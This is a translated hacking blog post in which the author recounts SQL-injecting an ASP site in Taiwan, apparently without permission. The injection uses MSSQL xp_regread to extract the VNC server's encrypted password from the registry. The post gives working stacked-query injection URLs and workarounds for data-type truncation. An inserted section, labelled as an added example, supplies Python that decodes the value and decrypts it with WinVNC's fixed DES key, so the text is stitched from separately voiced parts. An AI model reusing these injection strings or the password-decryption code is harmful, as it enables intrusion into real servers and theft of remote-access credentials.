MSSQL DB

xiaoxiao, 2021-03-06

I believe everyone is already familiar with ASP + MSSQL injection; even someone who does not understand SQL syntax can use NBSI to break into a large number of websites with ease. But even an SQL injection master, when the injection point only has the db_owner role in MSSQL and the site's admin backend cannot be guessed, is left staring at nothing; apart from the backup-to-webshell trick, I know of no better way in. And a webshell obtained through a database backup is mostly a theoretical thing: if the webshell comes out at 20 MB, can you still use it? Not long ago I ran into exactly such a site in Taiwan. NBSI had pulled out the administrator's password, but the username came back as a pile of garbage in NBSI because the site used Traditional Chinese encoding. I found the backend too, but all I could do was look at it. What to do? I scanned all the ports and found 5900 open, so I guessed that the administrator used VNC to remotely control the server. That gave me an idea: read VNC's encrypted password out of the registry through the injection point and crack it. Watch my performance!

Telnetting to port 5900 on the server returned the banner shown in Figure 1, which confirmed that the server runs VNC. Everyone knows xp_regread can be used to read the registry, so submit the following statements in turn:

http://www.something.com/script.asp?id=2;create table [dbo].[cyfd]([gyfd] [char](255));

This creates a table named cyfd with a single column, gyfd, of type char with length 255. Next, put data into the table:

http://www.something.com/script.asp?id=2;declare @result varchar(255) exec master.dbo.xp_regread 'HKEY_CURRENT_USER','Software\ORL\WinVNC3','Password',@result output insert into cyfd(gyfd) values(@result);

This reads the encrypted password value from the registry and inserts it into the table just created. Note that the registry path is Software\ORL\WinVNC3 with backslashes and has to be passed to xp_regread as a quoted string (and the spaces and quotes must be URL-encoded when the statement is submitted through a browser). Then pull the VNC encrypted password back out of the table with a blind comparison:

http://www.something.com/script.asp?id=2 and 1=(select count(*) from cyfd where gyfd>1)

But the result was that gyfd came back empty. If it had been that easy there would be no article. What was the reason? Was my syntax wrong? I checked it over and found no mistake. Is the value stored differently in the registry? Later I installed VNC on my own machine and tested there; the result was a single number, 5. CZY happened to be online, so I asked him, and he suggested changing the gyfd column to the binary data type. Worth a try. So I tested on my own machine, submitting:

http://127.0.0.1/script.asp?id=2;create table [dbo].[cyfd]([gyfd] [binary](20));

http://127.0.0.1/script.asp?id=2;declare @result binary(20) exec master.dbo.xp_regread 'HKEY_CURRENT_USER','Software\ORL\WinVNC3','Password',@result output insert into cyfd(gyfd) values(@result);--

Then I used NBSI to dump the value of gyfd from the cyfd table. A result did come out: VNC's encrypted password value was 0x0e3515ac0000000000000000000000000000. But that is not right: on my machine the password value in the registry is the hex bytes 0E, 35, 15, AC, 00, 62, D3, 08. binary(n) is a fixed-length type; when the input is shorter than n bytes the remainder is padded with zeros. The binary(20) in my injection statement is more than enough to hold the VNC encrypted password, so why so much zero padding? Because my VNC password is 0E3515AC0062D308: when xp_regread reaches the 00 byte it decides it has read the whole value and treats 00 as a terminator, so I only got 0x0e3515ac. Dizzy!

After leafing through the book I finally found a special data type, uniqueidentifier, which stores a 16-byte binary value. Rewrite the injection statements:

http://127.0.0.1/script.asp?id=2;create table [dbo].[cyfd]([gyfd] [uniqueidentifier]);

http://127.0.0.1/script.asp?id=2;declare @result uniqueidentifier exec master.dbo.xp_regread 'HKEY_CURRENT_USER','Software\ORL\WinVNC3','Password',@result output insert into cyfd(gyfd) values(@result);--

Then run it with NBSI. A value came out, but it was AC15350E-6200-08D3-0000-000000000000.

How does AC15350E-6200-08D3-0000-000000000000 differ from the correct password value 0e3515ac0062d308 that I can see in the registry? Only in byte order: SQL Server displays a uniqueidentifier with its first three groups in little-endian order, so AC15350E is the bytes 0E 35 15 AC, 6200 is 00 62 and 08D3 is D3 08. Put back together that is 0E3515AC0062D308, and the trailing groups are the zero padding of the 16-byte value. Everyone can manage that much elementary-school arithmetic, so I won't teach it. Feed the eight bytes to a VNC password cracker and see whether it comes out.
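The decoding step above, as an added example that is not part of the original article: it turns the uniqueidentifier string that NBSI displayed back into the raw bytes xp_regread read, models why the char and binary(20) attempts lost everything after the first 0x00 byte, and goes one step further than the article by deriving the DES key a standard library needs to decrypt a WinVNC password. The GUID string and registry bytes are the article's own values; the fixed WinVNC key and the bit-reversal convention are from the VNC sources, and pycryptodome (Crypto.Cipher.DES) is assumed to be installed only for the optional final step.

```python
"""Decode a WinVNC3 Password value that came back through a uniqueidentifier
column, and model the NUL truncation seen with char/binary(20).

Added example, not code from the original article. Assumes the GUID text is
exactly what NBSI displayed, that the registry value is the 8-byte DES
ciphertext WinVNC stores, and (for decrypt_vnc_password only) that pycryptodome
is installed."""
import uuid

# What SQL Server displayed for the uniqueidentifier column (from the article).
GUID_FROM_NBSI = "AC15350E-6200-08D3-0000-000000000000"

# The raw value the article shows in the registry editor on the test machine.
REGISTRY_BYTES = bytes.fromhex("0E3515AC0062D308")

# WinVNC's fixed DES key as it appears in the VNC sources (fixedkey[8]).
VNC_FIXED_KEY = bytes([23, 82, 107, 6, 35, 78, 88, 7])


def guid_display_to_bytes(guid_text: str) -> bytes:
    """SQL Server prints a uniqueidentifier with the first three groups
    byte-swapped (little-endian DWORD, WORD, WORD); bytes_le undoes that and
    returns the 16 bytes in storage order."""
    return uuid.UUID(guid_text).bytes_le


def vnc_password_blob(guid_text: str, length: int = 8) -> bytes:
    """The WinVNC3 Password value is 8 bytes; the rest of the 16-byte column
    is zero padding because the value is shorter than the type."""
    return guid_display_to_bytes(guid_text)[:length]


def c_string_truncate(value: bytes) -> bytes:
    """Model what the char/varchar and binary(20) attempts produced: the value
    handed back by xp_regread was cut at the first 0x00 byte."""
    nul = value.find(b"\x00")
    return value if nul < 0 else value[:nul]


def as_binary20_display(value: bytes) -> str:
    """How a binary(20) column shows a short value: right-padded with zeros."""
    return "0x" + value.ljust(20, b"\x00").hex()


def vnc_des_key() -> bytes:
    """WinVNC feeds its fixed key to the d3des routine, which reads key bits
    in the opposite order from a standard DES library, so each key byte is
    bit-reversed before use with a normal DES implementation."""
    return bytes(int(f"{b:08b}"[::-1], 2) for b in VNC_FIXED_KEY)


def decrypt_vnc_password(blob: bytes) -> str:
    """Decrypt the 8-byte registry value with DES-ECB under the VNC key.
    Requires pycryptodome (assumed installed; imported lazily so the rest of
    the module works without it)."""
    from Crypto.Cipher import DES
    plain = DES.new(vnc_des_key(), DES.MODE_ECB).decrypt(blob[:8])
    return plain.rstrip(b"\x00").decode("latin-1")


if __name__ == "__main__":
    blob = vnc_password_blob(GUID_FROM_NBSI)
    print("bytes recovered from the GUID :", blob.hex())
    print("what binary(20) showed instead:", as_binary20_display(c_string_truncate(blob)))
    try:
        print("VNC password                  :", decrypt_vnc_password(blob))
    except ImportError:
        print("pycryptodome not installed; skipping the DES step")
```

If the value is still sitting in the cyfd table, the same reordering can be done server-side: converting the uniqueidentifier column to binary(16) returns the bytes in storage order, so the hex that comes back reads 0E3515AC0062D308 followed by zeros without any manual swapping.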

So all the tests on my own machine succeeded. Then I used this method on the Taiwan site. Hey, it still did not give me the VNC password; perhaps the Traditional Chinese VNC stores it differently in the registry. One thing worth checking in that situation: HKEY_CURRENT_USER as seen by xp_regread is the hive of the account the SQL Server service runs as, not the administrator's desktop session, and a WinVNC that runs as a service keeps its default settings, Password included, under HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default. Still, a morning's study gained me a little, so I'll leave it here.

Please credit the original source when reposting: https://www.9cbs.com/read-57769.html
